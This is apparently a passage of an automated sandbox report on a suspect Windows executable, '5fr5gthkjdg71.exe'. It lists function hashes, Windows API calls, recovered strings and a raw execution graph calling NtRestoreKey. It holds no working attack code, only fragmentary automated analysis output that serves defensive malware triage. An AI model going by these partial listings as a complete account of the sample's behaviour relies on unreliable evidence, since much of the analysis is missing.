                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                    • String ID:
                                                                    • API String ID: 1077098981-0
                                                                    • Opcode ID: 9edbcf9d2794e0348031a328796bb330983a25da98c756b6acd651cd8133bd29
                                                                    • Instruction ID: 7ad190884daecc458dd06bc97c21120eb555974ee0aee8d4d792f1e36ee85731
                                                                    • Opcode Fuzzy Hash: 9edbcf9d2794e0348031a328796bb330983a25da98c756b6acd651cd8133bd29
                                                                    • Instruction Fuzzy Hash: 4751A132A18B4296E750EF61E4447AEF3B4FB89B84FA04035EA4E57A54DF7CE504DB10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                    • String ID:
                                                                    • API String ID: 4141327611-0
                                                                    • Opcode ID: a98e5aeb67f48d2f6f979bd70fbe768edfa1404fbf159e78b91cdf96afedf3b8
                                                                    • Instruction ID: 3c532bbadd3a5895e853e4d2f0bf517094da3d80096f57b5026ef498ffa4ec07
                                                                    • Opcode Fuzzy Hash: a98e5aeb67f48d2f6f979bd70fbe768edfa1404fbf159e78b91cdf96afedf3b8
                                                                    • Instruction Fuzzy Hash: A541B371E0874266F766AF10A86437DE390EF80B94FB44930DA4C47AD5DFACD881A720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3823481717-0
                                                                    • Opcode ID: 930a69d4a68418f54a984dac1d66c28d9725d16089e00c4b4ab1159678b5317d
                                                                    • Instruction ID: 29c8fa3cb77e1c346732f54f55332bfa3e2e11c44f1a0fd6f2d8eee41e34c31c
                                                                    • Opcode Fuzzy Hash: 930a69d4a68418f54a984dac1d66c28d9725d16089e00c4b4ab1159678b5317d
                                                                    • Instruction Fuzzy Hash: A241E462F10792A4FF00EFB4E8851ECA371FB44B98BA06235DE5D27A99DFB8D441D250
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF731CAC3DB), ref: 00007FF731CB0B11
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF731CAC3DB), ref: 00007FF731CB0B73
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF731CAC3DB), ref: 00007FF731CB0BAD
                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF731CAC3DB), ref: 00007FF731CB0BD7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                    • String ID:
                                                                    • API String ID: 1557788787-0
                                                                    • Opcode ID: 57e6a8c8eb3660c1ef58ab29e04114fb274abfae31478a384663a9e2e76f5968
                                                                    • Instruction ID: b65b752ced5db978c613093b5dc46de3a98ba524ab3d5e1644cd8f681f251065
                                                                    • Opcode Fuzzy Hash: 57e6a8c8eb3660c1ef58ab29e04114fb274abfae31478a384663a9e2e76f5968
                                                                    • Instruction Fuzzy Hash: E1216121F1DB5291E720EF126440029F7A4FB54BD4BA88534DE8EA3BA4DFBCE4619350
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$abort
                                                                    • String ID:
                                                                    • API String ID: 1447195878-0
                                                                    • Opcode ID: 66754dd10562acfe9150f83282709bfe11e0b7c2362ae99d4c12b657f2a22dea
                                                                    • Instruction ID: 52119760cfbbec2952ee68ff6d36f581e27acb78474a5507f702940c008fbeea
                                                                    • Opcode Fuzzy Hash: 66754dd10562acfe9150f83282709bfe11e0b7c2362ae99d4c12b657f2a22dea
                                                                    • Instruction Fuzzy Hash: 98018010F0920262FB5AB771A96917CD3A15F447D0FB40838D95E437D6DDACF841A220
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 659ac7cef5a6230f511b131fe25ef100f867fa9a2810ce63495c253f9cdf3390
                                                                    • Instruction ID: dff8a6ca8f680d5e48c14ccba0416f2bc8a255a8ff5b404e957bd04e6ffbfca6
                                                                    • Opcode Fuzzy Hash: 659ac7cef5a6230f511b131fe25ef100f867fa9a2810ce63495c253f9cdf3390
                                                                    • Instruction Fuzzy Hash: 08E04861F0970296FF187B75A859139A350AF48B41FA8443AC82F473A4DD7CE099E730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID: DXGIDebug.dll
                                                                    • API String ID: 3668304517-540382549
                                                                    • Opcode ID: ada38951124cec9a0e116e3a1c84714f16beb5e64cf8bb08149ba912fedf6f7a
                                                                    • Instruction ID: 4d64c2a746f501eb9a59ae6be4beb7ae94a3936a351e169d4fb35c06088ebf0c
                                                                    • Opcode Fuzzy Hash: ada38951124cec9a0e116e3a1c84714f16beb5e64cf8bb08149ba912fedf6f7a
                                                                    • Instruction Fuzzy Hash: A371CE32A14B81A6EB14DF65E8443ADB3A4FB187D4FA04635DBAC03B95DFB8E461D300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: e+000$gfff
                                                                    • API String ID: 3215553584-3030954782
                                                                    • Opcode ID: f19aa8e360a5519298b9773b70f05fda243e234b3046621750ac1af24fd8595b
                                                                    • Instruction ID: 3712b558d46a0f1acc6a9e813b297468e04603bb9a4c3a3ae467ad98cbf26590
                                                                    • Opcode Fuzzy Hash: f19aa8e360a5519298b9773b70f05fda243e234b3046621750ac1af24fd8595b
                                                                    • Instruction Fuzzy Hash: 9A516A62F187C29AE7269F39984036DEB91EB80B90F988731C79C47BC6CE6CE450C710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                    • String ID: SIZE
                                                                    • API String ID: 449872665-3243624926
                                                                    • Opcode ID: 67c97aca8507826492130fd72c7ecce989bee0afc1e7b5207916a55734ded634
                                                                    • Instruction ID: 0b0571414fb2f1d5f3a04d34a4ed45fbd86f5fd2f0785d9faa12cd4b462e9c51
                                                                    • Opcode Fuzzy Hash: 67c97aca8507826492130fd72c7ecce989bee0afc1e7b5207916a55734ded634
                                                                    • Instruction Fuzzy Hash: 3D41B562E1878665EB11EB64E4853BDE360EFC57A0FE04231E69C03AD5EEBCD541D720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                    • String ID: C:\Users\user\Desktop\5fr5gthkjdg71.exe
                                                                    • API String ID: 3307058713-4156724931
                                                                    • Opcode ID: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
                                                                    • Instruction ID: 9ebf2228fb942aa6f25f9f7230b349b4f99a3c606a225f4ae5cca0858edf4409
                                                                    • Opcode Fuzzy Hash: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
                                                                    • Instruction Fuzzy Hash: 7341B132E08A02A5EB56FF29A8400BCF794FF44BC4BA44435E90D47745DEBDE881D364
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ItemText$DialogWindow
                                                                    • String ID: ASKNEXTVOL
                                                                    • API String ID: 445417207-3402441367
                                                                    • Opcode ID: 22de5c0305e8ad35c840bc1d83534c6cebb95b1e5787128294acc2f2908b0105
                                                                    • Instruction ID: 897fd68613334811c540846011f94204eb32b92dff5d0595c26b3efe1f560326
                                                                    • Opcode Fuzzy Hash: 22de5c0305e8ad35c840bc1d83534c6cebb95b1e5787128294acc2f2908b0105
                                                                    • Instruction Fuzzy Hash: 75418422E1868261FB10BB15E8512BDE3A1BF85BC4FF40035DE4D07B95EEBDE451A360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_snwprintf
                                                                    • String ID: $%s$@%s
                                                                    • API String ID: 2650857296-834177443
                                                                    • Opcode ID: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
                                                                    • Instruction ID: b123ae7183fdcef37f00cb18d24d544dddb336ca11a9bf4ff376bbfcd31de691
                                                                    • Opcode Fuzzy Hash: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
                                                                    • Instruction Fuzzy Hash: 1931F472F18A46A5EB50EF65E4802E9E3A0FB84788FE01032EE0D17B55EE7CE501E710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleType
                                                                    • String ID: @
                                                                    • API String ID: 3000768030-2766056989
                                                                    • Opcode ID: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
                                                                    • Instruction ID: 9516451076143ce1d8e39392fe0b77ae014fbc6be4c4117b91e181f884453799
                                                                    • Opcode Fuzzy Hash: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
                                                                    • Instruction Fuzzy Hash: C6210622E0878250EB719B28A494139AB50FB45774FB80735D66F03BD4CEBCD891E3B4
                                                                    APIs
                                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF731CA1CBE), ref: 00007FF731CA403C
                                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF731CA1CBE), ref: 00007FF731CA4082
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
                                                                    • Instruction ID: 18da78552f31586b22250058f5e66784db855d57536a1c30cc7c8af11df434b3
                                                                    • Opcode Fuzzy Hash: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
                                                                    • Instruction Fuzzy Hash: A8114F32A08B8192EB219F15E4402A9B7A5FB88B94F688635DF8D07768DF7CD551DB00
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF731C8E8DB,?,?,?,00007FF731C845FA,?,?,?), ref: 00007FF731C8E9DF
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF731C8E8DB,?,?,?,00007FF731C845FA,?,?,?), ref: 00007FF731C8E9EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastObjectSingleWait
                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                    • API String ID: 1211598281-2248577382
                                                                    • Opcode ID: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
                                                                    • Instruction ID: c5f95cb08196a1fa975bbef4727611007f2b48dc7538181aea73b5c9eefdb762
                                                                    • Opcode Fuzzy Hash: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
                                                                    • Instruction Fuzzy Hash: 95E09A61E1A842A1F704B735AC861A8A311BF657B0FF48331D13E815E19EACA555A321
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: FindHandleModuleResource
                                                                    • String ID: RTL
                                                                    • API String ID: 3537982541-834975271
                                                                    • Opcode ID: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
                                                                    • Instruction ID: eb736b023820b8e3f74662eb4389c6ffcd77cc15cac7e095955c4f91ad05d7d0
                                                                    • Opcode Fuzzy Hash: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
                                                                    • Instruction Fuzzy Hash: ACD05E91F0A60292FF19ABB5A449334A360AF1DB41FE8A038C90E46390EEBCD084D760

                                                                    Execution Graph

                                                                    Execution Coverage:3.7%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:8.2%
                                                                    Total number of Nodes:85
                                                                    Total number of Limit Nodes:3
                                                                    execution_graph 3072 7ff6880c154e 3113 7ff6880c1394 3072->3113 3074 7ff6880c1558 3075 7ff6880c155d 3074->3075 3076 7ff6880c1394 2 API calls 3074->3076 3077 7ff6880c1394 2 API calls 3075->3077 3076->3075 3078 7ff6880c1567 3077->3078 3079 7ff6880c156c 3078->3079 3080 7ff6880c1394 2 API calls 3078->3080 3081 7ff6880c1394 2 API calls 3079->3081 3080->3079 3082 7ff6880c1576 3081->3082 3083 7ff6880c157b 3082->3083 3084 7ff6880c1394 2 API calls 3082->3084 3085 7ff6880c1394 2 API calls 3083->3085 3084->3083 3086 7ff6880c1585 3085->3086 3087 7ff6880c158a 3086->3087 3088 7ff6880c1394 2 API calls 3086->3088 3089 7ff6880c1394 2 API calls 3087->3089 3088->3087 3090 7ff6880c1599 3089->3090 3091 7ff6880c1394 2 API calls 3090->3091 3092 7ff6880c15a3 3091->3092 3093 7ff6880c15a8 3092->3093 3094 7ff6880c1394 2 API calls 3092->3094 3095 7ff6880c1394 2 API calls 3093->3095 3094->3093 3096 7ff6880c15b2 3095->3096 3097 7ff6880c15b7 3096->3097 3098 7ff6880c1394 2 API calls 3096->3098 3099 7ff6880c1394 2 API calls 3097->3099 3098->3097 3100 7ff6880c15c1 3099->3100 3101 7ff6880c15c6 3100->3101 3102 7ff6880c1394 2 API calls 3100->3102 3103 7ff6880c1394 2 API calls 3101->3103 3102->3101 3104 7ff6880c15d0 3103->3104 3105 7ff6880c15d5 3104->3105 3106 7ff6880c1394 2 API calls 3104->3106 3107 7ff6880c1394 2 API calls 3105->3107 3106->3105 3108 7ff6880c15df 3107->3108 3109 7ff6880c15e4 3108->3109 3110 7ff6880c1394 2 API calls 3108->3110 3111 7ff6880c1394 2 API calls 3109->3111 3110->3109 3112 7ff6880c15f3 3111->3112 3114 7ff6880c9950 malloc 3113->3114 3115 7ff6880c13b8 3114->3115 3116 7ff6880c13c6 NtRestoreKey 3115->3116 3116->3074 3020 